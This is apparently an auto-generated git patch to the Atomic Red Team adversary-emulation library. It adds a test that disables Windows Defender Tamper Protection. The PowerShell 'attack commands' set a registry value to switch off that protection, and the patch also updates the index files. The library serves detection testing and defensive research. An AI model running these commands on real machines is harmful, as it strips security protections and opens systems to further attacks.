From 660993d192575a5de7ef4cc8ec88ea18612115d1 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Wed, 30 Mar 2022 20:04:14 +0000
Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs
 branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |  1 +
 atomics/Indexes/Indexes-Markdown/index.md     |  1 +
 .../Indexes/Indexes-Markdown/windows-index.md |  1 +
 atomics/Indexes/index.yaml                    | 14 ++++++++
 atomics/T1562.001/T1562.001.md                | 35 +++++++++++++++++++
 6 files changed, 53 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 6a8d6e12..c96fbc40 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -405,6 +405,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,24,Tamper with Windows Defende
 defense-evasion,T1562.001,Disable or Modify Tools,25,office-365-Disable-AntiPhishRule,b9bbae2c-2ba6-4cf3-b452-8e8f908696f3,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,26,Disable Windows Defender with DISM,871438ac-7d6e-432a-b27d-3e7db69faf58,command_prompt
 defense-evasion,T1562.001,Disable or Modify Tools,27,Disable Defender with Defender Control,178136d8-2778-4d7a-81f3-d517053a4fd6,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,28,Disable Windows Defender Tamper Protection,5fde6578-9419-46ef-9258-269dc8656c3e,powershell
 defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
 defense-evasion,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
 defense-evasion,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 77b4e2e1..c769f4bd 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -266,6 +266,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defende
 defense-evasion,T1562.001,Disable or Modify Tools,24,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,26,Disable Windows Defender with DISM,871438ac-7d6e-432a-b27d-3e7db69faf58,command_prompt
 defense-evasion,T1562.001,Disable or Modify Tools,27,Disable Defender with Defender Control,178136d8-2778-4d7a-81f3-d517053a4fd6,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,28,Disable Windows Defender Tamper Protection,5fde6578-9419-46ef-9258-269dc8656c3e,powershell
 defense-evasion,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
 defense-evasion,T1070.004,File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
 defense-evasion,T1070.004,File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 32e86603..2861d4dd 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -635,6 +635,7 @@
   - Atomic Test #25: office-365-Disable-AntiPhishRule [office-365]
   - Atomic Test #26: Disable Windows Defender with DISM [windows]
   - Atomic Test #27: Disable Defender with Defender Control [windows]
+  - Atomic Test #28: Disable Windows Defender Tamper Protection [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index d57341c2..b989287e 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -442,6 +442,7 @@
   - Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows]
   - Atomic Test #26: Disable Windows Defender with DISM [windows]
   - Atomic Test #27: Disable Defender with Defender Control [windows]
+  - Atomic Test #28: Disable Windows Defender Tamper Protection [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 3a10811f..2e2fb8c2 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -26573,6 +26573,20 @@ defense-evasion:
 '
         name: powershell
         elevation_required: true
+    - name: Disable Windows Defender Tamper Protection
+      auto_generated_guid: 5fde6578-9419-46ef-9258-269dc8656c3e
+      description: Disabling Windows Defender tamper protection to allow attacks such
+        as [Process Doppleganging](https://medium.com/cyber-unbound/process-doppelg%C3%A4nging-684bdd6b760f).
+        Tamper Protection will be disabled after the next reboot.
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          New-Item -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Feature'
+          New-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Feature' -name 'TamperData' -value 0
+        cleanup_command: Set-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows
+          Defender\Feature' -name 'TamperData' -value 1
+        name: powershell
   T1078.002:
     technique:
       external_references:
diff --git a/atomics/T1562.001/T1562.001.md b/atomics/T1562.001/T1562.001.md
index 96c6c1be..9c5c3a00 100644
--- a/atomics/T1562.001/T1562.001.md
+++ b/atomics/T1562.001/T1562.001.md
@@ -58,6 +58,8 @@
 
 - [Atomic Test #27 - Disable Defender with Defender Control](#atomic-test-27---disable-defender-with-defender-control)
 
+- [Atomic Test #28 - Disable Windows Defender Tamper Protection](#atomic-test-28---disable-windows-defender-tamper-protection)
+
 
 <br/>
 
@@ -1149,4 +1151,37 @@ expand-archive -LiteralPath "$env:temp\defendercontrol.zip" -DestinationPath "$e
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #28 - Disable Windows Defender Tamper Protection
+Disabling Windows Defender tamper protection to allow attacks such as [Process Doppleganging](https://medium.com/cyber-unbound/process-doppelg%C3%A4nging-684bdd6b760f). Tamper Protection will be disabled after the next reboot.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 5fde6578-9419-46ef-9258-269dc8656c3e
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+New-Item -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Feature'
+New-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Feature' -name 'TamperData' -value 0
+```
+
+#### Cleanup Commands:
+```powershell
+Set-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Feature' -name 'TamperData' -value 1
+```
+
+
+
+
+
 <br/>